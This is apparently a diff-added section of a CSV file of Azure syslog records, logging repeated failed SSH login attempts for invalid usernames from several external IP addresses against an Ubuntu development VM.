+6323,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:51:38,UbuntuDevEnv,2019-06-26 16:51:37,auth,UbuntuDevEnv,info,Invalid user svn from 35.154.19.93 port 51868,41533,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,svn,35.154.19.9,51868,,
+6324,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:51:38,UbuntuDevEnv,2019-06-26 16:51:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,41533,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6325,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:51:38,UbuntuDevEnv,2019-06-26 16:51:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41533,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6326,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:51:40,UbuntuDevEnv,2019-06-26 16:51:39,auth,UbuntuDevEnv,info,Failed password for invalid user svn from 35.154.19.93 port 51868 ssh2,41533,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,svn,35.154.19.9,51868,,
+6327,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:51:40,UbuntuDevEnv,2019-06-26 16:51:39,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 51868:11: Normal Shutdown, Thank you for playing [preauth]",41533,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,51868,,
+6328,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:51:40,UbuntuDevEnv,2019-06-26 16:51:39,auth,UbuntuDevEnv,info,Disconnected from invalid user svn 35.154.19.93 port 51868 [preauth],41533,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,svn,35.154.19.9,51868,,
+6329,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:51:57,UbuntuDevEnv,2019-06-26 16:51:57,auth,UbuntuDevEnv,info,Invalid user bot from 81.0.212.18 port 40058,41604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bot,81.0.212.1,40058,,
+6330,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:51:57,UbuntuDevEnv,2019-06-26 16:51:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,41604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6331,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:51:57,UbuntuDevEnv,2019-06-26 16:51:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6332,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:51:59,UbuntuDevEnv,2019-06-26 16:51:59,auth,UbuntuDevEnv,info,Failed password for invalid user bot from 81.0.212.18 port 40058 ssh2,41604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bot,81.0.212.1,40058,,
+6333,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:51:59,UbuntuDevEnv,2019-06-26 16:51:59,auth,UbuntuDevEnv,info,Disconnected from invalid user bot 81.0.212.18 port 40058 [preauth],41604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bot,81.0.212.1,40058,,
+6334,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:51:59,UbuntuDevEnv,2019-06-26 16:51:59,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 40058:11: Bye Bye [preauth],41604,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,40058,,
+6335,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:52:10,UbuntuDevEnv,2019-06-26 16:52:09,auth,UbuntuDevEnv,info,Invalid user svn from 35.154.19.93 port 55166,41724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,svn,35.154.19.9,55166,,
+6336,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:52:10,UbuntuDevEnv,2019-06-26 16:52:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6337,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:52:10,UbuntuDevEnv,2019-06-26 16:52:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,41724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6338,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:52:11,UbuntuDevEnv,2019-06-26 16:52:11,auth,UbuntuDevEnv,info,Failed password for invalid user svn from 35.154.19.93 port 55166 ssh2,41724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,svn,35.154.19.9,55166,,
+6339,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:52:11,UbuntuDevEnv,2019-06-26 16:52:11,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 55166:11: Normal Shutdown, Thank you for playing [preauth]",41724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,55166,,
+6340,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:52:11,UbuntuDevEnv,2019-06-26 16:52:11,auth,UbuntuDevEnv,info,Disconnected from invalid user svn 35.154.19.93 port 55166 [preauth],41724,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,svn,35.154.19.9,55166,,
+6341,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:52:27,UbuntuDevEnv,2019-06-26 16:52:26,auth,UbuntuDevEnv,info,Invalid user exim from 171.8.199.77 port 45236,41791,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,exim,171.8.199.7,45236,,
+6342,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:52:27,UbuntuDevEnv,2019-06-26 16:52:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41791,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6343,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:52:27,UbuntuDevEnv,2019-06-26 16:52:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,41791,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+6344,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:52:29,UbuntuDevEnv,2019-06-26 16:52:28,auth,UbuntuDevEnv,info,Failed password for invalid user exim from 171.8.199.77 port 45236 ssh2,41791,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,exim,171.8.199.7,45236,,
+6345,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:52:29,UbuntuDevEnv,2019-06-26 16:52:28,auth,UbuntuDevEnv,info,Disconnected from invalid user exim 171.8.199.77 port 45236 [preauth],41791,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,exim,171.8.199.7,45236,,
+6346,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:52:29,UbuntuDevEnv,2019-06-26 16:52:28,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 45236:11: Bye Bye [preauth],41791,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,45236,,
+6347,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:52:43,UbuntuDevEnv,2019-06-26 16:52:42,auth,UbuntuDevEnv,info,Invalid user server from 35.154.19.93 port 58464,41842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,35.154.19.9,58464,,
+6348,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:52:43,UbuntuDevEnv,2019-06-26 16:52:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,41842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6349,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:52:43,UbuntuDevEnv,2019-06-26 16:52:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6350,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:52:44,UbuntuDevEnv,2019-06-26 16:52:44,auth,UbuntuDevEnv,info,Failed password for invalid user server from 35.154.19.93 port 58464 ssh2,41842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,35.154.19.9,58464,,
+6351,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:52:44,UbuntuDevEnv,2019-06-26 16:52:44,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 58464:11: Normal Shutdown, Thank you for playing [preauth]",41842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,58464,,
+6352,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:52:44,UbuntuDevEnv,2019-06-26 16:52:44,auth,UbuntuDevEnv,info,Disconnected from invalid user server 35.154.19.93 port 58464 [preauth],41842,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,35.154.19.9,58464,,
+6353,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:53:16,UbuntuDevEnv,2019-06-26 16:53:16,auth,UbuntuDevEnv,info,Invalid user server from 35.154.19.93 port 33534,41962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,35.154.19.9,33534,,
+6354,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:53:16,UbuntuDevEnv,2019-06-26 16:53:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,41962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6355,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:53:16,UbuntuDevEnv,2019-06-26 16:53:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,41962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6356,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:53:19,UbuntuDevEnv,2019-06-26 16:53:18,auth,UbuntuDevEnv,info,Failed password for invalid user server from 35.154.19.93 port 33534 ssh2,41962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,35.154.19.9,33534,,
+6357,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:53:19,UbuntuDevEnv,2019-06-26 16:53:18,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 33534:11: Normal Shutdown, Thank you for playing [preauth]",41962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,33534,,
+6358,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:53:19,UbuntuDevEnv,2019-06-26 16:53:18,auth,UbuntuDevEnv,info,Disconnected from invalid user server 35.154.19.93 port 33534 [preauth],41962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,35.154.19.9,33534,,
+6359,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:53:26,UbuntuDevEnv,2019-06-26 16:53:25,auth,UbuntuDevEnv,info,Invalid user ts from 81.0.212.18 port 49418,42007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts,81.0.212.1,49418,,
+6360,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:53:26,UbuntuDevEnv,2019-06-26 16:53:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6361,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:53:26,UbuntuDevEnv,2019-06-26 16:53:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,42007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6362,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:53:28,UbuntuDevEnv,2019-06-26 16:53:27,auth,UbuntuDevEnv,info,Failed password for invalid user ts from 81.0.212.18 port 49418 ssh2,42007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts,81.0.212.1,49418,,
+6363,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:53:28,UbuntuDevEnv,2019-06-26 16:53:27,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 49418:11: Bye Bye [preauth],42007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,49418,,
+6364,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:53:28,UbuntuDevEnv,2019-06-26 16:53:27,auth,UbuntuDevEnv,info,Disconnected from invalid user ts 81.0.212.18 port 49418 [preauth],42007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts,81.0.212.1,49418,,
+6365,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:53:47,UbuntuDevEnv,2019-06-26 16:53:47,auth,UbuntuDevEnv,info,Invalid user user from 35.154.19.93 port 36830,42073,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,35.154.19.9,36830,,
+6366,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:53:47,UbuntuDevEnv,2019-06-26 16:53:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42073,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6367,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:53:47,UbuntuDevEnv,2019-06-26 16:53:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,42073,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6368,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:53:49,UbuntuDevEnv,2019-06-26 16:53:48,auth,UbuntuDevEnv,info,Failed password for invalid user user from 35.154.19.93 port 36830 ssh2,42073,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,35.154.19.9,36830,,
+6369,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:53:49,UbuntuDevEnv,2019-06-26 16:53:48,auth,UbuntuDevEnv,info,Disconnected from invalid user user 35.154.19.93 port 36830 [preauth],42073,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,35.154.19.9,36830,,
+6370,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:53:49,UbuntuDevEnv,2019-06-26 16:53:48,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 36830:11: Normal Shutdown, Thank you for playing [preauth]",42073,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,36830,,
+6371,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:05,UbuntuDevEnv,2019-06-26 16:54:05,auth,UbuntuDevEnv,info,Invalid user debbie from 80.108.220.67 port 34244,42118,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,debbie,80.108.220.6,34244,,
+6372,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:05,UbuntuDevEnv,2019-06-26 16:54:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=80.108.220.67,42118,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,80.108.220.6,,0,
+6373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:05,UbuntuDevEnv,2019-06-26 16:54:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42118,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:07,UbuntuDevEnv,2019-06-26 16:54:07,auth,UbuntuDevEnv,info,Failed password for invalid user debbie from 80.108.220.67 port 34244 ssh2,42118,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,debbie,80.108.220.6,34244,,
+6375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:07,UbuntuDevEnv,2019-06-26 16:54:07,auth,UbuntuDevEnv,info,Disconnected from invalid user debbie 80.108.220.67 port 34244 [preauth],42118,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,debbie,80.108.220.6,34244,,
+6376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:07,UbuntuDevEnv,2019-06-26 16:54:07,auth,UbuntuDevEnv,info,Received disconnect from 80.108.220.67 port 34244:11: Bye Bye [preauth],42118,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,80.108.220.6,34244,,
+6377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:20,UbuntuDevEnv,2019-06-26 16:54:20,auth,UbuntuDevEnv,info,Invalid user user from 35.154.19.93 port 40172,42187,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,35.154.19.9,40172,,
+6378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:20,UbuntuDevEnv,2019-06-26 16:54:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,42187,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:20,UbuntuDevEnv,2019-06-26 16:54:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,42187,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:23,UbuntuDevEnv,2019-06-26 16:54:22,auth,UbuntuDevEnv,info,Failed password for invalid user user from 35.154.19.93 port 40172 ssh2,42187,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,35.154.19.9,40172,,
+6381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:23,UbuntuDevEnv,2019-06-26 16:54:22,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 40172:11: Normal Shutdown, Thank you for playing [preauth]",42187,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,40172,,
+6382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:54:23,UbuntuDevEnv,2019-06-26 16:54:22,auth,UbuntuDevEnv,info,Disconnected from invalid user user 35.154.19.93 port 40172 [preauth],42187,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,35.154.19.9,40172,,
